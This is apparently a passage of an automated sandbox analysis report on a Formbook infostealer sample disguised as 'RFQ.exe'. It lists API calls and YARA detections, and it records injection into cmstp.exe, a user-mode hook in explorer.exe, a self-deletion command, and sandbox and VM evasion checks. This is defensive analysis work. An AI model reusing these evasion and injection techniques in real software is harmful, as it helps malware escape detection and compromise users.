          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DFA770 NtOpenThread,6_2_04DFA770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9770 NtSetInformationFile,6_2_04DF9770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9760 NtOpenProcess,6_2_04DF9760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DFA710 NtOpenProcessToken,6_2_04DFA710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9730 NtQueryVirtualMemory,6_2_04DF9730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF98F0 NtReadVirtualMemory,6_2_04DF98F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF98A0 NtWriteVirtualMemory,6_2_04DF98A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DFB040 NtSuspendThread,6_2_04DFB040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9820 NtEnumerateKey,6_2_04DF9820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF99D0 NtCreateProcessEx,6_2_04DF99D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9950 NtQueueApcThread,6_2_04DF9950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9A80 NtOpenDirectoryObject,6_2_04DF9A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9A10 NtQuerySection,6_2_04DF9A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9A00 NtProtectVirtualMemory,6_2_04DF9A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9A20 NtResumeThread,6_2_04DF9A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DFA3B0 NtGetContextThread,6_2_04DFA3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DF9B00 NtSetValueKey,6_2_04DF9B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D39E80 NtClose,6_2_02D39E80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D39E00 NtReadFile,6_2_02D39E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D39F30 NtAllocateVirtualMemory,6_2_02D39F30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D39D50 NtCreateFile,6_2_02D39D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D39E4B NtReadFile,6_2_02D39E4B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D39F2A NtAllocateVirtualMemory,6_2_02D39F2A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D39DA2 NtCreateFile,6_2_02D39DA2
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00D2C21C0_2_00D2C21C
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00D2EBF40_2_00D2EBF4
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00D2EBF80_2_00D2EBF8
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041E0A61_2_0041E0A6
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041D18B1_2_0041D18B
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041D33A1_2_0041D33A
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041DBCB1_2_0041DBCB
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00409DEA1_2_00409DEA
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00409E301_2_00409E30
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041E6D01_2_0041E6D0
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041D75B1_2_0041D75B
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E744966_2_04E74496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7D4666_2_04E7D466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB4776_2_04DDB477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DC841F6_2_04DC841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E825DD6_2_04E825DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DCD5E06_2_04DCD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE25816_2_04DE2581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E72D826_2_04E72D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E81D556_2_04E81D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E82D076_2_04E82D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DB0D206_2_04DB0D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E82EF76_2_04E82EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD56006_2_04DD5600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD6E306_2_04DD6E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7D6166_2_04E7D616
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E81FF16_2_04E81FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E8DFCE6_2_04E8DFCE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E828EC6_2_04E828EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E820A86_2_04E820A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DCB0906_2_04DCB090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE20A06_2_04DE20A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E8E8246_2_04E8E824
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E710026_2_04E71002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDA8306_2_04DDA830
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD99BF6_2_04DD99BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DBF9006_2_04DBF900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DD41206_2_04DD4120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E74AEF6_2_04E74AEF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E822AE6_2_04E822AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E6FA2B6_2_04E6FA2B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDB2366_2_04DDB236
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E623E36_2_04E623E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEABD86_2_04DEABD8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E7DBD26_2_04E7DBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E703DA6_2_04E703DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDEB9A6_2_04DDEB9A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DE138B6_2_04DE138B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DEEBB06_2_04DEEBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDAB406_2_04DDAB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E5CB4F6_2_04E5CB4F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E82B286_2_04E82B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04DDA3096_2_04DDA309
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3E0A66_2_02D3E0A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3E6D06_2_02D3E6D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D29E306_2_02D29E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D22FB06_2_02D22FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D29DEA6_2_02D29DEA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D22D906_2_02D22D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04DBB150 appears 145 times
          Source: RFQ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: RFQ.exeBinary or memory string: OriginalFilename vs RFQ.exe
          Source: RFQ.exe, 00000000.00000002.237403943.00000000003F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename6 vs RFQ.exe
          Source: RFQ.exe, 00000000.00000002.241884570.00000000059C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs RFQ.exe
          Source: RFQ.exeBinary or memory string: OriginalFilename vs RFQ.exe
          Source: RFQ.exe, 00000001.00000002.273202915.0000000001D7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
          Source: RFQ.exe, 00000001.00000002.272895759.0000000001698000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs RFQ.exe
          Source: RFQ.exe, 00000001.00000002.272309435.0000000000E32000.00000002.00020000.sdmpBinary or memory string: OriginalFilename6 vs RFQ.exe
          Source: RFQ.exeBinary or memory string: OriginalFilename6 vs RFQ.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.238898971.000000000390C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.487639591.0000000002D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.272791500.00000000014B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.486767546.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.272273185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.272819143.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/2
          Source: C:\Users\user\Desktop\RFQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ.exe.logJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeMutant created: \Sessions\1\BaseNamedObjects\vCCFQQCsy
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4120:120:WilError_01
          Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RFQ.exeVirustotal: Detection: 39%
          Source: RFQ.exeReversingLabs: Detection: 52%
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Users\user\Desktop\RFQ.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: RFQ.exeStatic file information: File size 1214976 > 1048576
          Source: RFQ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: RFQ.exe, 00000001.00000002.272895759.0000000001698000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000001.00000002.272969501.0000000001AD0000.00000040.00000001.sdmp, cmstp.exe, 00000006.00000002.488430968.0000000004D90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ.exe, 00000001.00000002.272969501.0000000001AD0000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: RFQ.exe, 00000001.00000002.272895759.0000000001698000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: RFQ.exe, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.RFQ.exe.3f0000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.RFQ.exe.3f0000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.RFQ.exe.e30000.1.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.RFQ.exe.e30000.0.unpack, FormLogin.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004178E5 pushfd ; ret 1_2_004178E6
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00416A7F push ecx; ret 1_2_00416B48
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00416AE7 push ecx; ret 1_2_00416B48
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00416ABB push ecx; ret 1_2_00416B48
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00416B4B push ecx; ret 1_2_00416B48
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00417B5E push ecx; ret 1_2_00417BBC
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041E61C push esi; ret 1_2_0041E6C4
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041E6C5 push esi; ret 1_2_0041E6C4
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041E6D0 push esi; ret 1_2_0041E6C4
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041CEF2 push eax; ret 1_2_0041CEF8
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041CEFB push eax; ret 1_2_0041CF62
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041CEA5 push eax; ret 1_2_0041CEF8
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041CF5C push eax; ret 1_2_0041CF62
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00416FDF push ss; retf 1_2_00416FF3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04E0D0D1 push ecx; ret 6_2_04E0D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D36AE7 push ecx; ret 6_2_02D36B48
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D36ABB push ecx; ret 6_2_02D36B48
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D36A7F push ecx; ret 6_2_02D36B48
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D37B5E push ecx; ret 6_2_02D37BBC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D36B4B push ecx; ret 6_2_02D36B48
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D378E5 pushfd ; ret 6_2_02D378E6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3E6D0 push esi; ret 6_2_02D3E6C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3E6C5 push esi; ret 6_2_02D3E6C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3CEF2 push eax; ret 6_2_02D3CEF8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3CEFB push eax; ret 6_2_02D3CF62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3CEA5 push eax; ret 6_2_02D3CEF8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3E61C push esi; ret 6_2_02D3E6C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D36FDF push ss; retf 6_2_02D36FF3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02D3CF5C push eax; ret 6_2_02D3CF62

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: Process Memory Space: RFQ.exe PID: 6524, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: RFQ.exe, 00000000.00000002.238156570.00000000029BB000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RFQ.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D298E4 second address: 0000000002D298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000002D29B4E second address: 0000000002D29B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00409A80 rdtsc 1_2_00409A80
          Source: C:\Users\user\Desktop\RFQ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\RFQ.exe TID: 6528Thread sleep time: -41500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\RFQ.exe TID: 6544Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6360Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6360Thread sleep time: -66000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 3412Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.255728761.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
